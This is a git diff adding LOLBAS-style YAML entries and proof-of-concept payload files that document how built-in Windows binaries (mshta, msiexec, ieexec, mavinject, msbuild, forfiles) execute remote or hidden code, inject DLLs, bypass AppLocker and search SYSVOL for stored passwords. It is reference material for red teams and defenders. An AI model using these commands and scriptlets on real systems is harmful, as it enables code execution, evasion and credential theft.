+  - Command: findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe
+    Description: 'Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.'
+  - Command: findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
+    Description: 'Search for stored password in Group Policy files stored on SYSVOL.'
+Full Path:
+  - c:\windows\system32\findstr.exe
+  - c:\windows\sysWOW64\findstr.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
+  - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
+Notes: Thanks to Oddvar Moe - @oddvarmoe
+
diff --git a/OSBinaries/Forfiles.yml b/OSBinaries/Forfiles.yml
new file mode 100644
index 0000000..25c9393
--- /dev/null
+++ b/OSBinaries/Forfiles.yml
@@ -0,0 +1,22 @@
+---
+Name: Forfiles.exe
+Description: Execute, Read ADS
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
+    Description: 'Executes calc.exe since there is a match for notepad.exe in the c:\\windows\\System32 folder.'
+  - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe"
+    Description: 'Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\\windows\\system32 folder.'
+Full Path:
+  - C:\Windows\system32\forfiles.exe
+  - C:\Windows\sysWOW64\forfiles.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/vector_sec/status/896049052642533376
+  - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
+  - https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
+Notes: Thanks to Eric - @vector_sec, Oddvar Moe - @oddvarmoe
+
diff --git a/OSBinaries/Gpscript.yml b/OSBinaries/Gpscript.yml
new file mode 100644
index 0000000..3b457d9
--- /dev/null
+++ b/OSBinaries/Gpscript.yml
@@ -0,0 +1,22 @@
+---
+Name: Gpscript.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: Gpscript /logon
+    Description: 'Executes logon scripts configured in Group Policy.'
+  - Command: Gpscript /startup
+    Description: 'Executes startup scripts configured in Group Policy.'
+Full Path:
+  - c:\windows\system32\gpscript.exe
+  - c:\windows\sysWOW64\gpscript.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/
+Notes: |
+    Thanks to Oddvar Moe - @oddvarmoe
+    Requires administrative rights and modifications to local group policy settings.
+
diff --git a/OSBinaries/Hh.yml b/OSBinaries/Hh.yml
new file mode 100644
index 0000000..8f58fe0
--- /dev/null
+++ b/OSBinaries/Hh.yml
@@ -0,0 +1,23 @@
+---
+Name: hh.exe
+Description: Download, Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: HH.exe http://www.google.com
+    Description: Opens google's web page with HTML Help.
+  - Command: HH.exe C:\
+    Description: Opens c:\\ with HTML Help.
+  - Command: HH.exe c:\windows\system32\calc.exe
+    Description: 'Opens calc.exe with HTML Help.'
+  - Command: HH.exe http://some.url/script.ps1
+    Description: Open the target PowerShell script with HTML Help.
+Full Path:
+  - c:\windows\system32\hh.exe
+  - c:\windows\sysWOW64\hh.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/
+Notes: Thanks to Oddvar Moe - @oddvarmoe
diff --git a/OSBinaries/Ie4unit.yml b/OSBinaries/Ie4unit.yml
new file mode 100644
index 0000000..f0ca116
--- /dev/null
+++ b/OSBinaries/Ie4unit.yml
@@ -0,0 +1,20 @@
+---
+Name: Ie4unit.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: ie4unit.exe -BaseSettings
+    Description: 'Executes commands from a specially prepared ie4uinit.inf file.'
+Full Path:
+  - 'c:\windows\system32\ie4unit.exe    '
+  - 'c:\windows\sysWOW64\ie4unit.exe    '
+  - 'c:\windows\system32\ieuinit.inf    '
+  - 'c:\windows\sysWOW64\ieuinit.inf    '
+Code Sample: []
+Detection: []
+Resources:
+  - https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
+Notes: Thanks to Jimmy - @bohops
+
diff --git a/OSBinaries/Ieexec.yml b/OSBinaries/Ieexec.yml
new file mode 100644
index 0000000..a31f8c5
--- /dev/null
+++ b/OSBinaries/Ieexec.yml
@@ -0,0 +1,18 @@
+---
+Name: IEExec.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
+    Description: 'Executes bypass.exe from the remote server.'
+Full Path:
+  - c:\windows\system32\ieexec.exe
+  - c:\windows\sysWOW64\ieexec.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
+Notes: Thanks to Casey Smith - @subtee
+
diff --git a/OSBinaries/Infdefaultinstall.yml b/OSBinaries/Infdefaultinstall.yml
new file mode 100644
index 0000000..e1d6e54
--- /dev/null
+++ b/OSBinaries/Infdefaultinstall.yml
@@ -0,0 +1,20 @@
+---
+Name: InfDefaultInstall.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: InfDefaultInstall.exe Infdefaultinstall.inf
+    Description: 'Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.'
+Full Path:
+  - c:\windows\system32\Infdefaultinstall.exe
+  - c:\windows\sysWOW64\Infdefaultinstall.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/KyleHanslovan/status/911997635455852544
+  - https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
+  - https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/
+Notes: Thanks to Kyle Hanslovan - @kylehanslovan
+
diff --git a/OSBinaries/Installutil.yml b/OSBinaries/Installutil.yml
new file mode 100644
index 0000000..2f575c3
--- /dev/null
+++ b/OSBinaries/Installutil.yml
@@ -0,0 +1,25 @@
+---
+Name: InstallUtil.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
+    Description: 'Execute the target .NET DLL or EXE.'
+Full Path:
+  - C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe
+  - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
+  - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
+  - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/
+  - https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12
+  - http://subt0x10.blogspot.no/2017/09/banned-file-execution-via.html
+  - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/InstallUtil.md
+  - https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/
+  - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
+Notes: Thanks to Casey Smith - @subtee
+
diff --git a/OSBinaries/Makecab.yml b/OSBinaries/Makecab.yml
new file mode 100644
index 0000000..210e4eb
--- /dev/null
+++ b/OSBinaries/Makecab.yml
@@ -0,0 +1,22 @@
+---
+Name: Makecab.exe
+Description: Package, Add ADS, Download
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
+    Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
+  - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
+    Description: Compresses the target file and stores it in the target file.
+  - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab
+    Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
+Full Path:
+  - c:\windows\system32\makecab.exe
+  - c:\windows\sysWOW64\makecab.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
+Notes: Thanks to Oddvar Moe - @oddvarmoe
+
diff --git a/OSBinaries/Mavinject.yml b/OSBinaries/Mavinject.yml
new file mode 100644
index 0000000..deb4bb3
--- /dev/null
+++ b/OSBinaries/Mavinject.yml
@@ -0,0 +1,22 @@
+---
+Name: Mavinject.exe
+Description: Execute, Read ADS
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll
+    Description: Inject evil.dll into a process with PID 3110.
+  - Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll"
+    Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172.
+Full Path:
+  - C:\Windows\System32\mavinject.exe
+  - C:\Windows\SysWOW64\mavinject.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/gN3mes1s/status/941315826107510784
+  - https://twitter.com/Hexcorn/status/776122138063409152
+  - https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
+Notes: Thanks to Giuseppe N3mes1s - @gN3mes1s, Adam - @hexacorn, Oddvar Moe - @oddvarmoe
+
diff --git a/OSBinaries/Msbuild.yml b/OSBinaries/Msbuild.yml
new file mode 100644
index 0000000..336c5fc
--- /dev/null
+++ b/OSBinaries/Msbuild.yml
@@ -0,0 +1,27 @@
+---
+Name: Msbuild.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: msbuild.exe pshell.xml
+    Description: Build and execute a C# project stored in the target XML file.
+  - Command: msbuild.exe Msbuild.csproj
+    Description: Build and execute a C# project stored in the target CSPROJ file.
+Full Path:
+  - C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe
+  - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe
+  - C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
+  - C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe
+  - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
+  - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Trusted_Developer_Utilities.md
+  - https://github.com/Cn33liz/MSBuildShell
+  - https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/
+  - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
+Notes: Thanks to Casey Smith - @subtee, Cn33liz - @Cneelis
+
diff --git a/OSBinaries/Msconfig.yml b/OSBinaries/Msconfig.yml
new file mode 100644
index 0000000..823b57a
--- /dev/null
+++ b/OSBinaries/Msconfig.yml
@@ -0,0 +1,19 @@
+---
+Name: Msconfig.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: Msconfig.exe -5
+    Description: Executes command embeded in crafted c:\windows\system32\mscfgtlc.xml.
+Full Path:
+  - c:\windows\system32\msconfig.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/pabraeken/status/991314564896690177
+Notes: |
+    Thanks to Pierre-Alexandre Braeken - @pabraeken
+    See the Payloads folder for an example mscfgtlc.xml file.
+
diff --git a/OSBinaries/Msdt.yml b/OSBinaries/Msdt.yml
new file mode 100644
index 0000000..1ecd5bf
--- /dev/null
+++ b/OSBinaries/Msdt.yml
@@ -0,0 +1,25 @@
+---
+Name: Msdt.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: Open .diagcab package
+    Description: ''
+  - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml
+      /skip TRUE
+    Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
+Full Path:
+  - 'C:\Windows\System32\Msdt.exe    '
+  - 'C:\Windows\SysWOW64\Msdt.exe    '
+Code Sample: []
+Detection: []
+Resources:
+  - https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
+  - https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
+  - https://twitter.com/harr0ey/status/991338229952598016
+Notes: |
+    Thanks to:
+    See the Payloads folder for an example PCW8E57.xml file.
+
diff --git a/OSBinaries/Mshta.yml b/OSBinaries/Mshta.yml
new file mode 100644
index 0000000..c4c4f6a
--- /dev/null
+++ b/OSBinaries/Mshta.yml
@@ -0,0 +1,28 @@
+---
+Name: mshta.exe
+Description: Execute, Read ADS
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: mshta.exe evilfile.hta
+    Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
+  - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))
+    Description: Executes VBScript supplied as a command line argument.
+  - Command: mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct").Exec();close();
+    Description: Executes JavaScript supplied as a command line argument.
+  - Command: mshta.exe "C:\ads\file.txt:file.hta"
+    Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
+Full Path:
+  - C:\Windows\System32\mshta.exe
+  - C:\Windows\SysWOW64\mshta.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Mshta.md
+  - https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4
+  - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct
+  - https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
+  - https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
+Notes: Thanks to Casey Smith - @subtee, Oddvar Moe - @oddvarmoe
+
diff --git a/OSBinaries/Msiexec.yml b/OSBinaries/Msiexec.yml
new file mode 100644
index 0000000..d1dbd56
--- /dev/null
+++ b/OSBinaries/Msiexec.yml
@@ -0,0 +1,25 @@
+---
+Name: Msiexec.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: msiexec /quiet /i cmd.msi
+    Description: Installs the target .MSI file silently.
+  - Command: msiexec /q /i http://192.168.100.3/tmp/cmd.png
+    Description: Installs the target remote & renamed .MSI file silently.
+  - Command: msiexec /y "C:\folder\evil.dll"
+    Description: Calls DLLRegisterServer to register the target DLL.
+  - Command: msiexec /z "C:\folder\evil.dll"
+    Description: Calls DLLRegisterServer to un-register the target DLL.
+Full Path:
+  - c:\windows\system32\msiexec.exe
+  - c:\windows\sysWOW64\msiexec.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/
+  - https://twitter.com/PhilipTsukerman/status/992021361106268161
+Notes: Thanks to ? - @netbiosX, PhilipTsukerman - @PhilipTsukerman
+
diff --git a/OSBinaries/Netsh.yml b/OSBinaries/Netsh.yml
new file mode 100644
index 0000000..0e29291
--- /dev/null
+++ b/OSBinaries/Netsh.yml
@@ -0,0 +1,28 @@
+---
+Name: Netsh.exe
+Description: Execute, Surveillance
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: |
+          netsh.exe trace start capture=yes filemode=append persistent=yes tracefile=\\server\share\file.etl IPv4.Address=!(<IPofRemoteFileShare>)
+          netsh.exe trace show status
+    Description: Capture network traffic on remote file share.
+  - Command: netsh.exe add helper C:\Path\file.dll
+    Description: Load (execute) NetSh.exe helper DLL file.
+  - Command: netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1
+    Description: Forward traffic from the listening address and proxy to a remote system.
+Full Path:
+  - C:\Windows\System32
+etsh.exe
+  - C:\Windows\SysWOW64
+etsh.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Persistence/Netsh_Helper_DLL.md
+  - https://attack.mitre.org/wiki/Technique/T1128
+  - https://twitter.com/teemuluotio/status/990532938952527873
+Notes: ''
+
diff --git a/OSBinaries/Nltest.yml b/OSBinaries/Nltest.yml
new file mode 100644
index 0000000..16aeb81
--- /dev/null
+++ b/OSBinaries/Nltest.yml
@@ -0,0 +1,17 @@
+---
+Name: Nltest.exe
+Description: Credentials
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: nltest.exe /SERVER:192.168.1.10 /QUERY
+    Description: ''
+Full Path:
+  - c:\windows\system32\nltest.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/sysopfb/status/986799053668139009
+  - https://ss64.com/nt/nltest.html
+Notes: Thanks to Sysopfb - @sysopfb
diff --git a/OSBinaries/Odbcconf.yml b/OSBinaries/Odbcconf.yml
new file mode 100644
index 0000000..93a9ee6
--- /dev/null
+++ b/OSBinaries/Odbcconf.yml
@@ -0,0 +1,22 @@
+---
+Name: odbcconf.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: odbcconf -f file.rsp
+    Description: Load DLL specified in target .RSP file.
+Full Path:
+  - 'c:\windows\system32\odbcconf.exe    '
+  - c:\windows\sysWOW64\odbcconf.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b
+  - https://github.com/woanware/application-restriction-bypasses
+  - https://twitter.com/subTee/status/789459826367606784
+Notes: |
+    Thanks to Casey Smith - @subtee, Nick Tyrer - @NickTyrer
+    See the Playloads folder for an example .RSP file.
+
diff --git a/OSBinaries/Openwith.yml b/OSBinaries/Openwith.yml
new file mode 100644
index 0000000..9f91ba1
--- /dev/null
+++ b/OSBinaries/Openwith.yml
@@ -0,0 +1,20 @@
+---
+Name: Openwith.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: OpenWith.exe /c C:\test.hta
+    Description: Opens the target file with the default application.
+  - Command: OpenWith.exe /c C:\testing.msi
+    Description: Opens the target file with the default application.
+Full Path:
+  - c:\windows\system32\Openwith.exe
+  - c:\windows\sysWOW64\Openwith.exe
+Code Sample: []
+Detection: []
+Resources:
+  - https://twitter.com/harr0ey/status/991670870384021504
+Notes: Thanks to Matt harr0ey - @harr0ey
+
diff --git a/OSBinaries/Payload/Cmstp.inf b/OSBinaries/Payload/Cmstp.inf
new file mode 100644
index 0000000..077bb2e
--- /dev/null
+++ b/OSBinaries/Payload/Cmstp.inf
@@ -0,0 +1,14 @@
+[version]
+Signature=$chicago$
+AdvancedINF=2.5
+
+[DefaultInstall_SingleUser]
+UnRegisterOCXs=UnRegisterOCXSection
+
+[UnRegisterOCXSection]
+%11%\scrobj.dll,NI,https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp_calc.sct
+
+[Strings]
+AppAct = "SOFTWARE\Microsoft\Connection Manager"
+ServiceName="Yay"
+ShortSvcName="Yay"
\ No newline at end of file
diff --git a/OSBinaries/Payload/Cmstp_calc.sct b/OSBinaries/Payload/Cmstp_calc.sct
new file mode 100644
index 0000000..74a556e
--- /dev/null
+++ b/OSBinaries/Payload/Cmstp_calc.sct
@@ -0,0 +1,23 @@
+<?XML version="1.0"?>
+<scriptlet>
+<registration 
+    progid="PoC"
+    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
+	<!-- regsvr32 /s /u /i:http://example.com/file.sct scrobj.dll -->
+
+	<!-- .sct files when downloaded, are executed from a path like this -->
+	<!-- Please Note, file extenstion does not matter -->
+	<!-- Though, the name and extension are arbitary.. -->
+	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
+	<!-- Based on current research, no registry keys are written, since call "uninstall" -->
+  	<!-- You can either execute locally, or from a url -->
+	<script language="JScript">
+		<![CDATA[
+	    		// calc.exe should launch, this could be any arbitrary code.
+      	   		// What you are hoping to catch is the cmdline, modloads, or network connections, or any variation
+			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");	
+	
+		]]>
+</script>
+</registration>
+</scriptlet>
\ No newline at end of file
diff --git a/OSBinaries/Payload/Evil.xbap b/OSBinaries/Payload/Evil.xbap
new file mode 100644
index 0000000..3046680
--- /dev/null
+++ b/OSBinaries/Payload/Evil.xbap
@@ -0,0 +1,8 @@
+private void Button_click(object sender, RoutedEventArgs e)
+{
+	if (RadioButton1.IsChecked == true)
+	{
+		Process.Start("C:\\poc\\evil.exe");
+		MessageBox.Show("BHello.");
+	}
+}
diff --git a/OSBinaries/Payload/Infdefaultinstall.inf b/OSBinaries/Payload/Infdefaultinstall.inf
new file mode 100644
index 0000000..43acce3
--- /dev/null
+++ b/OSBinaries/Payload/Infdefaultinstall.inf
@@ -0,0 +1,8 @@
+[Version] 
+Signature=$CHICAGO$
+
+[DefaultInstall]
+UnregisterDlls = Squiblydoo
+
+[Squiblydoo]
+11,,scrobj.dll,2,60,https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Infdefaultinstall_calc.sct
\ No newline at end of file
diff --git a/OSBinaries/Payload/Infdefaultinstall_calc.sct b/OSBinaries/Payload/Infdefaultinstall_calc.sct
new file mode 100644
index 0000000..0a58650
--- /dev/null
+++ b/OSBinaries/Payload/Infdefaultinstall_calc.sct
@@ -0,0 +1,16 @@
+<?XML version="1.0"?>
+<scriptlet>
+<registration 
+    progid="PoC"
+    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
+	<!-- Proof Of Concept - Casey Smith @subTee -->
+	<!--  License: BSD3-Clause -->
+	<script language="JScript">
+		<![CDATA[
+	
+			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
+	
+		]]>
+</script>
+</registration>
+</scriptlet>
\ No newline at end of file
diff --git a/OSBinaries/Payload/Msbuild.csproj b/OSBinaries/Payload/Msbuild.csproj
new file mode 100644
index 0000000..a10642c
--- /dev/null
+++ b/OSBinaries/Payload/Msbuild.csproj
@@ -0,0 +1,47 @@
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <!-- This inline task executes c# code. -->
+  <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildBypass.csproj -->
+  <!-- Feel free to use a more aggressive class for testing. -->
+  <Target Name="Hello">
+   <FragmentExample />
+   <ClassExample />
+  </Target>
+  <UsingTask
+    TaskName="FragmentExample"
+    TaskFactory="CodeTaskFactory"
+    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
+    <ParameterGroup/>
+    <Task>
+      <Using Namespace="System" />  
+      <Code Type="Fragment" Language="cs">
+        <![CDATA[
+			    Console.WriteLine("Hello From a Code Fragment");		
+        ]]>
+      </Code>
+    </Task>
+	</UsingTask>
+	<UsingTask
+    TaskName="ClassExample"
+    TaskFactory="CodeTaskFactory"
+    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
+	<Task>
+	<!-- <Reference Include="System.IO" /> Example Include -->		
+      <Code Type="Class" Language="cs">
+        <![CDATA[
+			using System;
+			using Microsoft.Build.Framework;
+			using Microsoft.Build.Utilities;
+				
+			public class ClassExample :  Task, ITask
+			{
+				public override bool Execute()
+				{
+					Console.WriteLine("Hello From a Class.");
+					return true;
+				}
+			}
+        ]]>
+      </Code>
+    </Task>
+  </UsingTask>
+</Project>
\ No newline at end of file
diff --git a/OSBinaries/Payload/Mshta_calc.sct b/OSBinaries/Payload/Mshta_calc.sct
new file mode 100644
index 0000000..6ccac30
--- /dev/null
+++ b/OSBinaries/Payload/Mshta_calc.sct
@@ -0,0 +1,43 @@
+<?XML version="1.0"?>
+<scriptlet>
+
+<registration
+    description="Bandit"
+    progid="Bandit"
+    version="1.00"
+    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
+	>
+
+	<!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
+	<!-- DFIR -->
+	<!--		.sct files are downloaded and executed from a path like this -->
+	<!-- Though, the name and extension are arbitary.. -->
+	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
+	<!-- Based on current research, no registry keys are written, since call "uninstall" -->
+
+
+	<!-- Proof Of Concept - Casey Smith @subTee -->
+	<script language="JScript">
+		<![CDATA[
+
+			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
+
+		]]>
+	</script>
+</registration>
+
+<public>
+    <method name="Exec"></method>
+</public>
+<script language="JScript">
+<![CDATA[
+
+	function Exec()
+	{
+		var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
+	}
+
+]]>
+</script>
+
+</scriptlet>
\ No newline at end of file
diff --git a/OSBinaries/Payload/PCW8E57.xml b/OSBinaries/Payload/PCW8E57.xml
new file mode 100644
index 0000000..bf3dea5
--- /dev/null
+++ b/OSBinaries/Payload/PCW8E57.xml
@@ -0,0 +1,13 @@
+
+<?xml version="1.0" encoding="utf-16"?>
+<Answers Version="1.0">
+	<Interaction ID="IT_LaunchMethod">
+		<Value>ContextMenu</Value>
+	</Interaction>
+	<Interaction ID="IT_SelectProgram">
+		<Value>NotListed</Value>
+	</Interaction>
+	<Interaction ID="IT_BrowseForFile">
+		<Value>C:\Windows\assembly\Exec-Execute.msi</Value>
+	</Interaction>
+</Answers>
diff --git a/OSBinaries/Payload/Regsvr32_calc.sct b/OSBinaries/Payload/Regsvr32_calc.sct
new file mode 100644
index 0000000..74a556e
--- /dev/null
+++ b/OSBinaries/Payload/Regsvr32_calc.sct
@@ -0,0 +1,23 @@
+<?XML version="1.0"?>
+<scriptlet>
+<registration 
+    progid="PoC"
+    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
+	<!-- regsvr32 /s /u /i:http://example.com/file.sct scrobj.dll -->
+
+	<!-- .sct files when downloaded, are executed from a path like this -->
+	<!-- Please Note, file extenstion does not matter -->
+	<!-- Though, the name and extension are arbitary.. -->
+	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
+	<!-- Based on current research, no registry keys are written, since call "uninstall" -->
+  	<!-- You can either execute locally, or from a url -->
+	<script language="JScript">
+		<![CDATA[
+	    		// calc.exe should launch, this could be any arbitrary code.
+      	   		// What you are hoping to catch is the cmdline, modloads, or network connections, or any variation
+			var r = new ActiveXObject("WScript.Shell").Run("calc.exe");	
+	
+		]]>
+</script>
+</registration>
+</scriptlet>
\ No newline at end of file
diff --git a/OSBinaries/Payload/Wmic_calc.xsl b/OSBinaries/Payload/Wmic_calc.xsl
new file mode 100644
index 0000000..b405524
--- /dev/null
+++ b/OSBinaries/Payload/Wmic_calc.xsl
@@ -0,0 +1,11 @@
+<?xml version='1.0'?>
+<stylesheet
+xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
+xmlns:user="placeholder"
+version="1.0">
+<output method="text"/>
+	<ms:script implements-prefix="user" language="JScript">
+	<![CDATA[
+	var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
+	]]> </ms:script>
+</stylesheet>
\ No newline at end of file
diff --git a/OSBinaries/Payload/file.rsp b/OSBinaries/Payload/file.rsp
new file mode 100644
index 0000000..1d7b8bd
--- /dev/null
+++ b/OSBinaries/Payload/file.rsp
@@ -0,0 +1 @@
+REGSVR evil.dll
diff --git a/OSBinaries/Payload/mscfgtlc.xml b/OSBinaries/Payload/mscfgtlc.xml
new file mode 100644
index 0000000..a84f356
--- /dev/null
+++ b/OSBinaries/Payload/mscfgtlc.xml
@@ -0,0 +1,4 @@
+<?xml version="1.0" ?>
+<MSCONFIGTOOLS>
+<a NAME="LOLBin" PATH="%windir%\System32\WindowsPowerShell\v1.0\powershell.exe" DEFAULT_OPT="-nop -sta -enc -w 1 <BASE64ENCCOMMAND>" ADV_OPT="-command calc.exe" HELP="LOLBin MSCONFIGTOOLS"/>
+</MSCONFIGTOOLS>
diff --git a/OSBinaries/Pcalua.yml b/OSBinaries/Pcalua.yml
new file mode 100644
index 0000000..147f003
--- /dev/null
+++ b/OSBinaries/Pcalua.yml
@@ -0,0 +1,24 @@
+---
+Name: Pcalua.exe
+Description: Execute
+Author: ''
+Created: '2018-05-25'
+Categories: []
+Commands:
+  - Command: pcalua.exe -a calc.exe
+    Description: Open the target .EXE using the Program Compatibility Assistant.
+  - Command: pcalua.exe -a \\server\payload.dll
+    Description: Open the target .DLL file with the Program Compatibilty Assistant.
+  - Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
+    Description: Open the target .CPL file with the Program Compatibility Assistant.
+Full Path:
+  - c:\windows\system32\pcalua.exe
+Code Sample: []
+Detection: []
+Resources:
